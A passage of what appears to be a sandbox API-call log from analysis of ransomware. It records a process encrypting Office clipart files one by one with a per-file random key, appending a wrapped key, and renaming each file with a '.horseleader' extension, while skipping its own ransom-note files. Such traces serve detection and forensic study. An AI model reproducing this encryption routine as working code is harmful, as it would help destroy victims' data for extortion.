"c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.horseleader")) returned 1 [0252.606] GetProcessHeap () returned 0x780000 [0252.606] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.606] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9eb2200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9eb2200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5062, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00853_.WMF", cAlternateFileName="")) returned 1 [0252.607] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="Windows") returned -1 [0252.607] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0252.607] StrStrIW (lpFirst="AN00853_.WMF", lpSrch=".horseleader") returned 0x0 [0252.607] lstrcmpW (lpString1="AN00853_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.607] lstrcmpW (lpString1="AN00853_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.607] lstrlenW (lpString=".testttjffg") returned 11 [0252.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0252.608] StrStrW (lpFirst="AN00853_.WMF", lpSrch=".txt") returned 0x0 [0252.608] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20578) returned 1 [0252.608] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.611] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.611] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.611] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x62, lpOverlapped=0x0) returned 1 [0252.612] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x62, lpOverlapped=0x0) returned 1 [0252.612] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.612] CloseHandle (hObject=0x158) returned 1 [0252.612] GetProcessHeap () returned 0x780000 [0252.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.horseleader") returned 79 [0252.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.horseleader")) returned 1 [0252.614] GetProcessHeap () returned 0x780000 [0252.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.614] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2efb2900, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2efb2900, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x2a50, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00914_.WMF", cAlternateFileName="")) returned 1 [0252.614] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="Windows") returned -1 [0252.614] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0252.614] StrStrIW (lpFirst="AN00914_.WMF", lpSrch=".horseleader") returned 0x0 [0252.614] lstrcmpW (lpString1="AN00914_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.614] lstrcmpW (lpString1="AN00914_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.614] lstrlenW (lpString=".testttjffg") returned 11 [0252.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.614] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.616] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0252.616] StrStrW (lpFirst="AN00914_.WMF", lpSrch=".txt") returned 0x0 [0252.616] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10832) returned 1 [0252.616] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2a50, lpOverlapped=0x0) returned 1 [0252.619] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd5b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2a50, lpOverlapped=0x0) returned 1 [0252.619] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.619] CloseHandle (hObject=0x158) returned 1 [0252.620] GetProcessHeap () returned 0x780000 [0252.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.620] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.horseleader") returned 79 [0252.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.horseleader")) returned 1 [0252.621] GetProcessHeap () returned 0x780000 [0252.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.621] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9f500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8b9f500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x385c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00932_.WMF", cAlternateFileName="")) returned 1 [0252.621] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="Windows") returned -1 [0252.621] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0252.621] StrStrIW (lpFirst="AN00932_.WMF", lpSrch=".horseleader") returned 0x0 [0252.621] lstrcmpW (lpString1="AN00932_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.621] lstrcmpW (lpString1="AN00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.621] lstrlenW (lpString=".testttjffg") returned 11 [0252.621] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.621] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.621] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0252.622] StrStrW (lpFirst="AN00932_.WMF", lpSrch=".txt") returned 0x0 [0252.622] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14428) returned 1 [0252.622] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x385c, lpOverlapped=0x0) returned 1 [0252.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc7a4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.690] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x385c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x385c, lpOverlapped=0x0) returned 1 [0252.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.690] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.691] CloseHandle (hObject=0x158) returned 1 [0252.691] GetProcessHeap () returned 0x780000 [0252.691] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.horseleader") returned 79 [0252.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.horseleader")) returned 1 [0252.693] GetProcessHeap () returned 0x780000 [0252.693] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.693] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc14efd00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc14efd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00965_.WMF", cAlternateFileName="")) returned 1 [0252.693] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="Windows") returned -1 [0252.693] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0252.693] StrStrIW (lpFirst="AN00965_.WMF", lpSrch=".horseleader") returned 0x0 [0252.693] lstrcmpW (lpString1="AN00965_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.693] lstrcmpW (lpString1="AN00965_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.693] lstrlenW (lpString=".testttjffg") returned 11 [0252.693] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0252.694] StrStrW (lpFirst="AN00965_.WMF", lpSrch=".txt") returned 0x0 [0252.694] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7072) returned 1 [0252.694] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0252.697] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.697] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0252.697] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.697] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.698] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.698] CloseHandle (hObject=0x158) returned 1 [0252.698] GetProcessHeap () returned 0x780000 [0252.698] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.horseleader") returned 79 [0252.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.horseleader")) returned 1 [0252.699] GetProcessHeap () returned 0x780000 [0252.699] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d83ea00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d83ea00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01039_.WMF", cAlternateFileName="")) returned 1 [0252.700] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="Windows") returned -1 [0252.700] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0252.700] StrStrIW (lpFirst="AN01039_.WMF", lpSrch=".horseleader") returned 0x0 [0252.700] lstrcmpW (lpString1="AN01039_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.700] lstrcmpW (lpString1="AN01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.700] lstrlenW (lpString=".testttjffg") returned 11 [0252.700] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.700] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0252.701] StrStrW (lpFirst="AN01039_.WMF", lpSrch=".txt") returned 0x0 [0252.701] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3344) returned 1 [0252.701] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd10, lpOverlapped=0x0) returned 1 [0252.705] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.705] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd10, lpOverlapped=0x0) returned 1 [0252.705] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.706] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.706] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.706] CloseHandle (hObject=0x158) returned 1 [0252.706] GetProcessHeap () returned 0x780000 [0252.706] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.706] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.horseleader") returned 79 [0252.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.horseleader")) returned 1 [0252.713] GetProcessHeap () returned 0x780000 [0252.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.713] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e92000, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x31e92000, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x63c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01044_.WMF", cAlternateFileName="")) returned 1 [0252.713] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="Windows") returned -1 [0252.713] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0252.713] StrStrIW (lpFirst="AN01044_.WMF", lpSrch=".horseleader") returned 0x0 [0252.714] lstrcmpW (lpString1="AN01044_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.714] lstrcmpW (lpString1="AN01044_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.714] lstrlenW (lpString=".testttjffg") returned 11 [0252.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 